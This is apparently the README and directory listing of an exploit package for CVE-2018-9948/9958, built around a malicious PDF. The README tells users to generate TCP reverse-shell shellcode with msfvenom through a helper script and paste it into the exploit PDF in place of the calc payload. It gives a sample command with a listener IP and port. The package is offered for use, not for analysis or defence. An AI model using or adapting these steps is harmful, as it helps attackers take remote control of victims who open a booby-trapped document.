a exp for cve-2018-9948/9958 , current shellcode called win-calc ### 2018-9948-9958-exp
- "get_shellcode_from_msf.py" is a python script to get shellcode from msfvenom, then copy the output to the exp.pdf replace the 'calc' shellcode block, and finally it works. Ooooops, it's a tcp reverse shellcode.
- a sample code is like this: python get_shellcode_from_msf.py 192.168.1.79 1234
[4.0K] /data/pocs/dcf2f69010673c0c20d8397c2930b458ec8c9e4c
├── [1.0K] exp-calc
├── [ 919] get_shellocode_from_msf.py
├── [ 318] README.md
└── [ 782] safe-pdf-sample
0 directories, 4 files